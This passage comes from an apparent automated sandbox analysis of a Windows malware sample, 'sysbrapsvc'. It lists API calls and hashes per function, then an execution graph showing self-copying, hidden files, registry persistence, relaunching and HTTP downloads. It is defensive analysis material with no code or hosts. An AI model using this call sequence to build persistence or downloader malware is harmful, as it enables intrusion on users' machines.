                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction ID: 0b1db91c5ce03941f8675f6ecb7f2ec56fce17a7f2d6269111b0fb586e4650a4
                                                                                • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction Fuzzy Hash: 27111F326005186B8B10EF9EC48268ABBD6EF84361B15C136FC2CDF359D634E9414BD4
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3966618661-0
                                                                                • Opcode ID: 243eef822324ba6441ef6ee7b2426a7a3cc362dd8c79c8fc1e23d0c6d3f739d1
                                                                                • Instruction ID: 9f2c4cc69d55b471d510ac50d158e14e0eacb849a4393371b11790265c13a883
                                                                                • Opcode Fuzzy Hash: 243eef822324ba6441ef6ee7b2426a7a3cc362dd8c79c8fc1e23d0c6d3f739d1
                                                                                • Instruction Fuzzy Hash: 5841D175604B02ABC714DB38D848797F3A4BF84310F18823EE86D933D1E739A855CB99
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl
                                                                                • String ID:
                                                                                • API String ID: 435966717-0
                                                                                • Opcode ID: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction ID: b0d0b2528f3aca05c18ea064ccca22ed782aa92eb9f3aacb3aeadda2a23aac7b
                                                                                • Opcode Fuzzy Hash: e97f6b688e4649d03a543f53d1e87ffd622cab317a47a1f81aa90ba96deec30e
                                                                                • Instruction Fuzzy Hash: 92F01272A01414979B14EEFE84424CAF7E59F88374B218176FD1CE3260E570B90546F1
                                                                                APIs
                                                                                • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                  • Part of subcall function 0040A660: RtlFreeHeap.NTDLL(02260000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                • String ID: pdu
                                                                                • API String ID: 309973729-2320407122
                                                                                • Opcode ID: 00cfd710f7060dc95603062a2d73b44d16099702ce370f8748f90436b9a2d440
                                                                                • Instruction ID: 49315f9b5d193dc364c5f28f0bcb7aa8bb44b0403a6660fc991bd28791f727bd
                                                                                • Opcode Fuzzy Hash: 00cfd710f7060dc95603062a2d73b44d16099702ce370f8748f90436b9a2d440
                                                                                • Instruction Fuzzy Hash: A901D6B65003009BCB209F61ECC4D9B7778AF48310708467AFC05AB396CA39E8508775
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 2074799992-0
                                                                                • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                                                                • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                                                                • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                • API String ID: 672405725-0
                                                                                • Opcode ID: e468fb63f9ca5f1dd53f8d007d1a55cf1dbe40ebc69a0ff028c9d39c019d1df7
                                                                                • Instruction ID: e789c4acaeed7b47b7c3c4d69342d3bd95a049e3571e2ded942ca122a7fff21c
                                                                                • Opcode Fuzzy Hash: e468fb63f9ca5f1dd53f8d007d1a55cf1dbe40ebc69a0ff028c9d39c019d1df7
                                                                                • Instruction Fuzzy Hash: A5218175E04208FBDB04DFA4D885B9E7B74AF44309F10C4A9ED416B391D679AB80DB49
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Recv$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 3668019968-0
                                                                                • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                                                                • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                                                                • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 2121970615-0
                                                                                • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                                                                • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                                                                • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(02260634), ref: 0040D8D9
                                                                                • CloseHandle.KERNEL32(02260638), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(02260634), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(02260634), ref: 0040D924
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                • API String ID: 3102160386-0
                                                                                • Opcode ID: cbca7a221169012647a1f28369682e8a15b1de3ec01e61cab1fa519f4e6623a3
                                                                                • Instruction ID: 6abb592c5b2ce8a5c046663d5def4690e4bb0a573cdaefcdc4ae98697e0ceaa0
                                                                                • Opcode Fuzzy Hash: cbca7a221169012647a1f28369682e8a15b1de3ec01e61cab1fa519f4e6623a3
                                                                                • Instruction Fuzzy Hash: 4E1161B4D00208EBDB08DF94D984A9DB775FF44309F1485A9E806A7341C739EF94DB85
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                • Opcode ID: 5b7eeb46433a00e2792456c1da329b64645f09816065e024bdf8e8bd7b312279
                                                                                • Instruction ID: 487697b266744d2b5c3d358b1528705abebcded3db4b06867e0c0ac6ea0c4339
                                                                                • Opcode Fuzzy Hash: 5b7eeb46433a00e2792456c1da329b64645f09816065e024bdf8e8bd7b312279
                                                                                • Instruction Fuzzy Hash: 4A01F7792423049FC3209F26ED84A9B73F8AF45711F04443EE44693650DB39E401CB28
                                                                                APIs
                                                                                  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
                                                                                  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
                                                                                  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
                                                                                  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
                                                                                  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
                                                                                  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
                                                                                  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
                                                                                  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
                                                                                  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
                                                                                  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
                                                                                  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040DF15
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                • String ID: %S%S
                                                                                • API String ID: 1017111014-3267608656
                                                                                • Opcode ID: 4daf623f2c144d5ce8ca4d058e5cf2d16a515a3d8099bd7f9f5853ed51e801f6
                                                                                • Instruction ID: c1d615742e0f1fe272601d31d467041fc69409a08f8fe5a36c80dfd154d40f90
                                                                                • Opcode Fuzzy Hash: 4daf623f2c144d5ce8ca4d058e5cf2d16a515a3d8099bd7f9f5853ed51e801f6
                                                                                • Instruction Fuzzy Hash: 5F414BB5E0020A9FCB04DFE4C885AEFB7B9BF48304F148569E505B7390D738AA45CBA5
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                                                                • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                                                                • LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 469056452-0
                                                                                • Opcode ID: 4b006cdbe6058d68b82b42ad0cdc335d73043fce9a64b04b9801c300c0b4b7cf
                                                                                • Instruction ID: 7768dcd7b9dbcee261a05c0b48706a70a5e16e7133226d349280dc208485dc19
                                                                                • Opcode Fuzzy Hash: 4b006cdbe6058d68b82b42ad0cdc335d73043fce9a64b04b9801c300c0b4b7cf
                                                                                • Instruction Fuzzy Hash: 73216B70D04208ABDB04DF94D889BDEB771EB44304F14C1BAE84567281C3BDAA95CF9A

                                                                                Execution Graph

                                                                                Execution Coverage:0.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1470
                                                                                Total number of Limit Nodes:1
                                                                                execution_graph 4374 407500 Sleep CreateMutexA GetLastError 4375 407536 ExitProcess 4374->4375 4376 40753e 6 API calls 4374->4376 4377 4075e3 4376->4377 4378 4078a9 Sleep RegOpenKeyExW 4376->4378 4454 40ebe0 GetLocaleInfoA strcmp 4377->4454 4379 407902 RegOpenKeyExW 4378->4379 4380 4078d6 RegSetValueExA RegCloseKey 4378->4380 4382 407924 RegSetValueExA RegCloseKey 4379->4382 4383 407955 RegOpenKeyExW 4379->4383 4380->4379 4385 4079fa RegOpenKeyExW 4382->4385 4386 407977 RegCreateKeyExW RegCloseKey 4383->4386 4387 4079ac RegOpenKeyExW 4383->4387 4391 407a1c RegSetValueExA RegCloseKey 4385->4391 4392 407a4d RegOpenKeyExW 4385->4392 4386->4387 4387->4385 4390 4079ce RegSetValueExA RegCloseKey 4387->4390 4388 4075f0 ExitProcess 4389 4075f8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4393 40764c SetFileAttributesW RegOpenKeyExW 4389->4393 4394 4076de Sleep wsprintfW CopyFileW 4389->4394 4390->4385 4397 407b49 RegOpenKeyExW 4391->4397 4398 407aa4 RegOpenKeyExW 4392->4398 4399 407a6f RegCreateKeyExW RegCloseKey 4392->4399 4393->4394 4400 40767d wcslen RegSetValueExW 4393->4400 4395 407726 SetFileAttributesW RegOpenKeyExW 4394->4395 4396 4077b8 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4394->4396 4395->4396 4403 407757 wcslen RegSetValueExW 4395->4403 4396->4378 4404 407817 SetFileAttributesW RegOpenKeyExW 4396->4404 4401 407b97 RegOpenKeyExW 4397->4401 4402 407b6b RegSetValueExA RegCloseKey 4397->4402 4405 407ac6 RegCreateKeyExW RegCloseKey 4398->4405 4406 407afb RegOpenKeyExW 4398->4406 4399->4398 4400->4394 4407 4076b2 RegCloseKey 4400->4407 4408 407be5 RegOpenKeyExA 4401->4408 4409 407bb9 RegSetValueExA RegCloseKey 4401->4409 4402->4401 4403->4396 4410 40778c RegCloseKey 4403->4410 4404->4378 4411 407848 wcslen RegSetValueExW 4404->4411 4405->4406 4406->4397 4412 407b1d RegSetValueExA RegCloseKey 4406->4412 4456 40ee30 memset memset CreateProcessW 4407->4456 4414 407cf1 RegOpenKeyExA 4408->4414 4415 407c0b 8 API calls 4408->4415 4409->4408 4416 40ee30 6 API calls 4410->4416 4411->4378 4417 40787d RegCloseKey 4411->4417 4412->4397 4420 407d17 8 API calls 4414->4420 4421 407dfd Sleep 4414->4421 4415->4414 4422 4077a5 4416->4422 4423 40ee30 6 API calls 4417->4423 4419 4076d6 ExitProcess 4420->4421 4461 40cc80 4421->4461 4422->4396 4424 4077b0 ExitProcess 4422->4424 4426 407896 4423->4426 4426->4378 4428 4078a1 ExitProcess 4426->4428 4429 407e18 9 API calls 4464 405b60 InitializeCriticalSection CreateFileW 4429->4464 5289 405820 4429->5289 5298 406b50 Sleep GetModuleFileNameW 4429->5298 5312 4073b0 4429->5312 4431 407f84 4436 407ecd CreateEventA 4496 40c3b0 4436->4496 4445 40d610 17 API calls 4446 407f2d 4445->4446 4447 40d610 17 API calls 4446->4447 4448 407f49 4447->4448 4449 40d610 17 API calls 4448->4449 4450 407f65 4449->4450 4541 40d780 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4450->4541 4452 407f75 4550 40d8c0 4452->4550 4455 4075e8 4454->4455 4455->4388 4455->4389 4457 40eea1 ShellExecuteW 4456->4457 4458 40ee92 Sleep 4456->4458 4459 4076cb 4457->4459 4460 40eec7 Sleep 4457->4460 4458->4459 4459->4394 4459->4419 4460->4459 4559 40cc50 4461->4559 4465 405c85 4464->4465 4466 405b98 CreateFileMappingW 4464->4466 4478 40daf0 CoInitializeEx 4465->4478 4467 405bb9 MapViewOfFile 4466->4467 4468 405c7b CloseHandle 4466->4468 4469 405c71 CloseHandle 4467->4469 4470 405bd8 GetFileSize 4467->4470 4468->4465 4469->4468 4472 405bed 4470->4472 4471 405c67 UnmapViewOfFile 4471->4469 4472->4471 4474 405c2c 4472->4474 4477 405bfc 4472->4477 4688 40ccd0 4472->4688 4695 405c90 4472->4695 4475 40a660 _invalid_parameter 3 API calls 4474->4475 4475->4477 4477->4471 5003 40dbc0 socket 4478->5003 4480 407ec8 4491 406f70 CoInitializeEx SysAllocString 4480->4491 4481 40db98 5047 40a780 4481->5047 4484 40db5a 5028 40af30 htons 4484->5028 4485 40db10 4485->4480 4485->4481 4485->4484 5013 40de30 4485->5013 4490 40e920 24 API calls 4490->4481 4492 406f92 4491->4492 4493 406fa8 CoUninitialize 4491->4493 5192 406fc0 4492->5192 4493->4436 5201 40c370 4496->5201 4499 40c370 3 API calls 4500 40c3ce 4499->4500 4501 40c370 3 API calls 4500->4501 4502 40c3de 4501->4502 4503 40c370 3 API calls 4502->4503 4504 407ee5 4503->4504 4505 40d5e0 4504->4505 4506 40a240 7 API calls 4505->4506 4507 40d5eb 4506->4507 4508 407eef 4507->4508 4509 40d5f7 InitializeCriticalSection 4507->4509 4510 40b770 InitializeCriticalSection 4508->4510 4509->4508 4512 40b78a 4510->4512 4511 40b7b9 CreateFileW 4513 40b7e0 CreateFileMappingW 4511->4513 4514 40b8a2 4511->4514 4512->4511 5208 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4512->5208 5209 40b350 4512->5209 4517 40b801 MapViewOfFile 4513->4517 4518 40b898 CloseHandle 4513->4518 5257 40b010 EnterCriticalSection 4514->5257 4520 40b81c GetFileSize 4517->4520 4521 40b88e CloseHandle 4517->4521 4518->4514 4519 40b8a7 4523 40d610 17 API calls 4519->4523 4527 40b83b 4520->4527 4521->4518 4524 407ef9 4523->4524 4529 40d610 4524->4529 4525 40b884 UnmapViewOfFile 4525->4521 4527->4525 4528 40b350 32 API calls 4527->4528 5256 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 4527->5256 4528->4527 4530 40d627 EnterCriticalSection 4529->4530 4531 407f12 4529->4531 5284 40d700 4530->5284 4531->4445 4534 40d6eb LeaveCriticalSection 4534->4531 4535 40a490 9 API calls 4536 40d669 4535->4536 4536->4534 4537 40d67b CreateThread 4536->4537 4537->4534 4538 40d69e 4537->4538 4539 40d6c2 GetCurrentProcess GetCurrentProcess DuplicateHandle 4538->4539 4540 40d6e4 4538->4540 4539->4540 4540->4534 4542 40d7b6 InterlockedExchangeAdd 4541->4542 4543 40d899 GetCurrentThread SetThreadPriority 4541->4543 4542->4543 4547 40d7d0 4542->4547 4543->4452 4544 40d7e9 EnterCriticalSection 4544->4547 4545 40d857 LeaveCriticalSection 4545->4547 4549 40d86e 4545->4549 4546 40d833 WaitForSingleObject 4546->4547 4547->4543 4547->4544 4547->4545 4547->4546 4548 40d88c Sleep 4547->4548 4547->4549 4548->4547 4549->4543 4551 40d8cc EnterCriticalSection 4550->4551 4558 40d942 4550->4558 4552 40d8e8 4551->4552 4553 40d910 LeaveCriticalSection DeleteCriticalSection 4552->4553 4554 40d8fb CloseHandle 4552->4554 4555 40a660 _invalid_parameter 3 API calls 4553->4555 4554->4552 4556 40d936 4555->4556 4557 40a660 _invalid_parameter 3 API calls 4556->4557 4557->4558 4558->4431 4562 40c8a0 4559->4562 4563 40c8be 4562->4563 4565 40c8d3 4562->4565 4568 40c900 4563->4568 4566 407e0d 4565->4566 4594 40ca80 4565->4594 4566->4429 4566->4431 4569 40c9b2 4568->4569 4570 40c929 4568->4570 4572 40a240 7 API calls 4569->4572 4589 40c9aa 4569->4589 4570->4589 4628 40a240 4570->4628 4574 40c9d8 4572->4574 4576 402420 7 API calls 4574->4576 4574->4589 4578 40ca05 4576->4578 4580 4024e0 10 API calls 4578->4580 4582 40ca1f 4580->4582 4581 40c97f 4583 402420 7 API calls 4581->4583 4585 402420 7 API calls 4582->4585 4584 40c990 4583->4584 4586 4024e0 10 API calls 4584->4586 4587 40ca30 4585->4587 4586->4589 4588 4024e0 10 API calls 4587->4588 4590 40ca4a 4588->4590 4589->4566 4591 402420 7 API calls 4590->4591 4592 40ca5b 4591->4592 4593 4024e0 10 API calls 4592->4593 4593->4589 4595 40caa9 4594->4595 4596 40cb5a 4594->4596 4597 40a240 7 API calls 4595->4597 4622 40cb52 4595->4622 4599 40a240 7 API calls 4596->4599 4596->4622 4598 40cabf 4597->4598 4601 402420 7 API calls 4598->4601 4598->4622 4600 40cb7e 4599->4600 4603 402420 7 API 